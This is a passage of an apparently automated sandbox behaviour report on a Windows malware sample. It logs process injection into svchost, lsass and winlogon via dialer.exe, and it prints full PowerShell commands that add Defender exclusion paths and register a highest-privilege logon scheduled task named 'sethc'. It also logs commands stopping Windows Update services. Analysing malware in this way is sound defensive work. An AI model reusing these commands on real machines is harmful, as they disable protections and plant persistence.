                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DEBD3B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2735A070000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE5D40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254513D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13982AF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28075470000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16B11FA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24A0DA40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13954070000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 198375C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E4DB990000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11AECDD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe base: 1EC16F80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0108C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A03E6A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B66F1C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BAA95D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DAC1150000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7923A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADC2340000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24D249A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B2C0FB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: AD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EEC8960000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256EDBD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA7ED70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175B4780000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CD1620000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13F17A90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181E95B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF53B20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1755C590000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC61270000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,
                        Source: C:\Users\user\Desktop\file.exeThread register set: target process: 6996
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeThread register set: target process: 4576
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeThread register set: target process: 6436
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: A5A52908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: 9C002908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8AB42908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B9512908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: F0292908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8AF52908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: BD3B2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5A072908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E5D42908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 513D2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 82AF2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 75472908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 11FA2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DA42908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 54072908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 375C2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DB992908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: ECDD2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe EIP: 16F82908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 108C2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 3E6A2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F1C2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A95D2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C1152908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 923A2908
                        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C2342908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 249A2908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0FB2908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AD2908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C8962908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EDBD2908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7ED72908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B4782908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1622908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 17A92908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E95B2908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53B22908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5C592908
                        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 61272908
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#iejbryoj#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''c:\users\user\appdata\roaming\microsoft\dxpserver.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\microsoft\dxpserver.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'sethc' -runlevel 'highest' -force; }
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#iejbryoj#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''c:\users\user\appdata\roaming\microsoft\dxpserver.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\microsoft\dxpserver.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'sethc' -runlevel 'highest' -force; }
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
